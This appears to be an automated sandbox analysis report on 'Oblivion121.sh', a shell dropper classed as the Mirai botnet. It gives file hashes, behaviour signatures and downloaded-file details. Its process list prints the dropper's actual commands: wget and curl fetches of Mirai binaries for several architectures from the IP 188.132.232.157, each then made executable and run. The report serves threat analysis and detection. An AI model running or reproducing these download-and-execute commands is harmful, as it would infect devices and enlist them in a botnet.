Overview

overview

10

Static

static

1

Oblivion121.sh

ubuntu-18.04-amd64

10

Oblivion121.sh

debian-9-armhf

10

Oblivion121.sh

debian-9-mips

10

Oblivion121.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    30s
  • max time network
    32s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240611-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    15-12-2024 10:38

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Oblivion121.sh

  • Size

    1KB

  • MD5

    90e5e43e5d798a41934d7f30e8208b24

  • SHA1

    0748835c71a1c54c8ea6bc7d0baf831f12eb0ef7

  • SHA256

    09e9f78247105e4500f5722131940080633c40ba32803d3f4b5b370ae5ae6233

  • SHA512

    ea39caa2f2242cd2c46b6f8841fb6e4bb8defdb2fb2dfb831f0dde5cee12707dc1aebc920c1e0834bcc7fab1aeb5caf69cf3ba56f1e6d9a5b9c4bd7b87020032

Score
10/10
miraimiraibotnetdefense_evasiondiscovery

Malware Config

Extracted

Family

mirai

Botnet

MIRAI

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Mirai family
    mirai
  • Contacts a large (2587) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 4 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 4 IoCs
  • Modifies Watchdog functionality 1 TTPs 4 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Enumerates active TCP sockets 1 TTPs 2 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

    discovery
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads system network configuration 1 TTPs 2 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

    discovery
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 4 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 9 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/Oblivion121.sh
    /tmp/Oblivion121.sh
    1⤵
    • Writes file to tmp directory
    PID:708
    • /usr/bin/wget
      wget http://188.132.232.157/IGz/IGz.x86
      2⤵
      • Writes file to tmp directory
      PID:712
    • /usr/bin/curl
      curl -O http://188.132.232.157/IGz/IGz.x86
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:730
    • /bin/cat
      cat IGz.x86
      2⤵
        PID:737
      • /bin/chmod
        chmod +x cp IGz.x86 Oblivion121.sh systemd-private-431a5c22c369426d8da8ffd9746f5eb3-systemd-timedated.service-GWI1GP
        2⤵
        • File and Directory Permissions Modification
        PID:738
      • /tmp/cp
        ./cp x86
        2⤵
        • Executes dropped EXE
        PID:739
      • /usr/bin/wget
        wget http://188.132.232.157/IGz/IGz.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:741
      • /usr/bin/curl
        curl -O http://188.132.232.157/IGz/IGz.mips
        2⤵
        • Reads runtime system information
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:743
      • /bin/cat
        cat IGz.mips
        2⤵
        • System Network Configuration Discovery
        PID:744
      • /bin/chmod
        chmod +x cp IGz.mips IGz.x86 Oblivion121.sh systemd-private-431a5c22c369426d8da8ffd9746f5eb3-systemd-timedated.service-GWI1GP
        2⤵
        • File and Directory Permissions Modification
        PID:745
      • /tmp/cp
        ./cp mips
        2⤵
        • Executes dropped EXE
        • System Network Configuration Discovery
        PID:746
      • /usr/bin/wget
        wget http://188.132.232.157/IGz/IGz.mpsl
        2⤵
        • Writes file to tmp directory
        PID:748
      • /usr/bin/curl
        curl -O http://188.132.232.157/IGz/IGz.mpsl
        2⤵
        • Reads runtime system information
        • Writes file to tmp directory
        PID:749
      • /bin/cat
        cat IGz.mpsl
        2⤵
          PID:775
        • /bin/chmod
          chmod +x cp IGz.mips IGz.mpsl IGz.x86 Oblivion121.sh systemd-private-431a5c22c369426d8da8ffd9746f5eb3-systemd-timedated.service-GWI1GP
          2⤵
          • File and Directory Permissions Modification
          PID:777
        • /tmp/cp
          ./cp mpsl
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads system network configuration
          • Reads runtime system information
          PID:778
        • /usr/bin/wget
          wget http://188.132.232.157/IGz/IGz.arm4
          2⤵
            PID:782
          • /usr/bin/curl
            curl -O http://188.132.232.157/IGz/IGz.arm4
            2⤵
            • Reads runtime system information
            • Writes file to tmp directory
            PID:808
          • /bin/chmod
            chmod +x cp IGz.arm4 IGz.mips IGz.mpsl IGz.x86 Oblivion121.sh systemd-private-431a5c22c369426d8da8ffd9746f5eb3-systemd-timedated.service-GWI1GP
            2⤵
            • File and Directory Permissions Modification
            PID:812
          • /tmp/cp
            ./cp arm4
            2⤵
            • Executes dropped EXE
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Reads system network configuration
            • Reads runtime system information
            PID:813
          • /usr/bin/wget
            wget http://188.132.232.157/IGz/IGz.arm5
            2⤵
            • Writes file to tmp directory
            PID:820
          • /usr/bin/curl
            curl -O http://188.132.232.157/IGz/IGz.arm5
            2⤵
              PID:821

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • /tmp/IGz.x86
            Filesize

            72KB

            MD5

            acd283bf65ed831dd470134f403a9294

            SHA1

            3c0f8231e8089430e32ef8daea73597170a2b4c0

            SHA256

            8d4e7068fc99a8f0fc7e2b095c206fda09ade9ea61091c40405e90dd6894ed67

            SHA512

            0847ba7306de9087cd0a4f79f20de2da0baffa1e2d8c09d509b3bd573122593c935b6e39076393d08b9e2da12d89b55f70cbb3c99d42175c4daca848f00a8c72

            Download Submit

          • /tmp/cp
            Filesize

            153KB

            MD5

            558fc8df865663836770a42334dd88c0

            SHA1

            0276f7274984928e64fbe354bb0df966d1eacb86

            SHA256

            b23789685e87bf3931a7cc2c8d33dcf4417332e5d5a5cd7778f97e063f8d9118

            SHA512

            561756714ec8c40ed714e350df57f3c494e0995cfb6e0ca9146d4b47651f66b20d2c11d0fd77f3f05b92ca4ec05f3ddfb532ac92287a316354d2ea432e3fea4e

            Download Submit

          • /tmp/cp
            Filesize

            149KB

            MD5

            bb18c503add46a96288b7a15562dbbc7

            SHA1

            7d12569aea77474a3fa81c841d50fa0a2351f438

            SHA256

            b556b41e8071e7164f880963b24c4f2ae5fe28d2b71716e410a0f17a91eb607c

            SHA512

            9479a4c1784f08cfa7ee71b8d59841e81a581b3f9c0362ff8e11c6a4ccef2bf21460dafec49a770778cbb8e472fd7c000e00513e29363814bc6aa20ee34830ce

            Download Submit